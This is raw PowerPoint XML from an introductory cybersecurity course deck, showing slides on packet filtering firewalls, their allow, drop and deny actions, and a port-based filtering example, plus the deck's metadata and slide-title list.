                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DF4032C-30AB-1922-DE2C-7D6DB05F020A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14413" y="3318752"/>
              <a:ext cx="620075" cy="258268"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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7DD95E98-611D-25DE-661D-C1C98A26B2C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3775037" y="2550667"/>
              <a:ext cx="3096895" cy="1448435"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3096895" h="1448435">
                  <a:moveTo>
                    <a:pt x="533933" y="921232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38" y="920089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="929322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533908" y="930452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533933" y="921232"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3096895" h="1448435">
                  <a:moveTo>
                    <a:pt x="3096425" y="238404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3093605" y="229628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980465" y="911504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1970366" y="6819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964156" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958621" y="918984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961720" y="922388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958837" y="925982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1608048" y="1448308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613827" y="1441132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="976337" y="928268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358936" y="1045743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2359698" y="1036561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984948" y="919746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3096425" y="238404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8" name="object 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE52B027-A362-E718-69A3-766CA8D089B7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9" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B94B50A-C02C-A133-CAB1-848314E4D4FA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96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92483485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814177A-9693-6932-8F63-5F9EF15BB80B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936E36C-767A-6053-9CC4-CE94EAFCA782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Packet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Filtering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Firewalls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471B0DDB-3976-AC48-B958-3C5CABE57501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EE8081B-AAB4-DA50-B21F-9900FA748740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97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BD519A4-5525-1E6C-392B-38D664F057D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1545451"/>
            <a:ext cx="8016875" cy="280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635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filters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inspect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header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every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choose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how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treat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packet.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more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common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actions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are:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469265" indent="-4565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Allow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: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allow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pass</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469265" indent="-45656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Drop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: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drops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without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any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diagnostic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message</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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to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source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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host</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="275590" indent="-4572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252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Deny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: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do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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let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pass,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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but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notify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source </a:t>
            </a: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host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011999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1FB73510-F6A9-3AA9-97C7-283C012B73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498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32B5E9DB-5489-F3CE-0F25-6FD2E6EDB8CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="114046"/>
            <a:ext cx="7936052" cy="737458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="288366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27455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lang="en-US" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Firewalls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AFBEA0F-0DDF-7865-C418-41561E3608D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474185" y="1984804"/>
            <a:ext cx="621030" cy="2310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4610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>EXAMPLE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7FC8C71-946A-4D70-5609-49FA6840539B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1645411" y="1296163"/>
            <a:ext cx="6528434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2095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52525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Inspecting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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header</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0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0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does</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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0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give</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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you</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="20955">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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52525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>actual</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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r>
              <a:rPr sz="2000" b="1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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="20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20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company,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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network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 administrators</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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configure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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corporate firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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2000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allow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000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browsing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000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2000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20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internal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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network.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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They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do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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20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allowing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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20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have</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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80</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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20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443</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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destination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ports.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000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What</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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happens</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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internal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machine</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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tries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connect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000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via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SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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server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listening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20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port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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80?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200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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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sz="20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pass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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even</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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it</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="200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2000" b="1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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="200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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>traffic!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DE33199C-65D8-68CC-1C10-AE3C53D8B7F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1571244" y="2080197"/>
            <a:ext cx="7014972" cy="106616"/>
            <a:chOff x="1571244" y="2080196"/>
            <a:chExt cx="7014972" cy="106616"/>
          </a:xfrm>
        </p:grpSpPr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25B191DA-8922-28BC-8C71-8050557DB5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1244" y="2080196"/>
              <a:ext cx="7014972" cy="106616"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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4FB9FEAB-55C1-616E-8462-0029B9E748D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1614678" y="2116073"/>
              <a:ext cx="6920865" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6920865">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6920738" y="0"/>
                  </a:lnTo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D1B752E4-1AB7-4327-5E1A-86B853E1BC6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4836078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99A9CE4-49D7-FB24-E212-BCF1051780D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4846724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98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4013105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13C3E4D-6D83-8E2C-99B6-C42DBD89A764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445605" y="4800716"/>
            <a:ext cx="8281670" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8281670">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="828141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D485AAB-089B-17A5-DB8E-43DB549B726D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533031" y="114923"/>
            <a:ext cx="7936052" cy="601959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="154177" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2900" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="25252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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9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Packet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Filtering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vs.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Application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Attacks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6F172AC-DBF7-D94B-F4B3-7AA6B400F709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232108" y="4836955"/>
            <a:ext cx="2951479" cy="18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PTSv4:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Section</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>1,</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Module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Caendra</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Inc.</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a: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2019</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-75" baseline="5555" dirty="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:endParaRPr sz="1500" baseline="5555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7475A1F-514C-2E76-3DD6-490B01ACA41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232108" y="4847601"/>
            <a:ext cx="337947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252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="303276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p.</a:t>
            </a:r>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-20" dirty="0"/>
              <a:pPr marL="3032760">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="25"/>
                </a:spcBef>
              </a:pPr>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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B879EF5-EDF0-35FE-9F55-39E4A90A0AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="2434832"/>
            <a:ext cx="79616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252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Let’s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now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look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at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typical</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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example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where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packet</a:t>
            </a:r>
            <a:endParaRPr sz="2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inspection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does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not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stop</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-55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252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>server.</a:t>
            </a:r>
            <a:endParaRPr sz="24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70027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20454</TotalTime>
  <Words>10512</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>1636</Paragraphs>
  <Slides>163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70" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial MT</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Introduction to Cybersecurity</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Kali Linux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 Protocols</vt:lpstr>
      <vt:lpstr>2.1 Protocols</vt:lpstr>
      <vt:lpstr>2.1 Protocols</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>2.2 Packets</vt:lpstr>
      <vt:lpstr>Header</vt:lpstr>
      <vt:lpstr>Header</vt:lpstr>
      <vt:lpstr>Header</vt:lpstr>
      <vt:lpstr>2.2  Example – The IP Header</vt:lpstr>
      <vt:lpstr>2.2  Example – The IP Header</vt:lpstr>
      <vt:lpstr>2.2  Example – The IP Header</vt:lpstr>
      <vt:lpstr>2.2  Example – The IP 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7.1 What is penetration testing </vt:lpstr>
      <vt:lpstr>7.1 What is penetration testing </vt:lpstr>
      <vt:lpstr>7.1 Type of penetration testing </vt:lpstr>
      <vt:lpstr>7.1 Type of penetration testing </vt:lpstr>
      <vt:lpstr>7.1 Type of penetration testing </vt:lpstr>
      <vt:lpstr>7.2  Blue Team </vt:lpstr>
      <vt:lpstr>7.2 Blue Team </vt:lpstr>
      <vt:lpstr>7.2 Blue Team </vt:lpstr>
      <vt:lpstr>7.2  Blue Team</vt:lpstr>
      <vt:lpstr>7.3  Red Team </vt:lpstr>
      <vt:lpstr>7.3 Red Team </vt:lpstr>
      <vt:lpstr>7.3 Red Team </vt:lpstr>
      <vt:lpstr>7.3  Red Team </vt:lpstr>
      <vt:lpstr>7.4  SQL injection</vt:lpstr>
      <vt:lpstr>7.4 SQL injection</vt:lpstr>
      <vt:lpstr>7.4  SQL injection</vt:lpstr>
      <vt:lpstr>7.5  XSS</vt:lpstr>
      <vt:lpstr>7.5  XSS</vt:lpstr>
      <vt:lpstr>7.5   XSS </vt:lpstr>
      <vt:lpstr>7.6   Buffer Over Flow</vt:lpstr>
      <vt:lpstr>7.6 Buffer Over Flow</vt:lpstr>
      <vt:lpstr>7.7 Privilege Escalation</vt:lpstr>
      <vt:lpstr>7.7 Privilege Escalation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Cybersecurity</dc:title>
  <dc:creator>Carmen Lyall</dc:creator>
  <cp:lastModifiedBy>mostafa abujbal</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-08T17:28:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-21T14:51:50Z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2019-05-28T03:00:00Z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2025-04-08T03:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Producer">
    <vt:lpwstr>Microsoft® PowerPoint® for Office 365</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ICV">
    <vt:lpwstr>D1818E3C86CD40849FE1F72F5E9C12A9_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.20782</vt:lpwstr>
  </property>
</Properties>
</file>